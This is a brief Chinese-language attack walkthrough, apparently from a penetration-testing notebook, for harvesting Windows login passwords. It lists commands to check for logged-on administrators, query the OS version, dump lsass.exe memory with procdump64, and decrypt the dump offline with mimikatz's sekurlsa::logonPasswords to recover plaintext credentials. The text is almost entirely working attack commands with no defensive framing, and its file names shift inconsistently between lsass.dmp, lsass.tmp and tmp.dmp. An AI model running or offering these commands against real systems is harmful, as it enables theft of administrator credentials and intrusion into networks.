1、查看目標系統管理員登錄情況,管理員在線,抓到明文密碼的可能性更大。
query user
2、查看目標系統版本。
wmic OS get Caption,OSArchitecture
3、通過Procdump dump lsass.exe 進程數據並將其保存到 lsass.dmp 文件中。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
4、將lsass.tmp拉取到本地使用mimikatz解密目標系統密碼。(本地機器需與目標機器的版本位數一致。)
mimikatz.exe “log res.log” “sekurlsa::minidump tmp.dmp” “sekurlsa::logonPasswords full” exit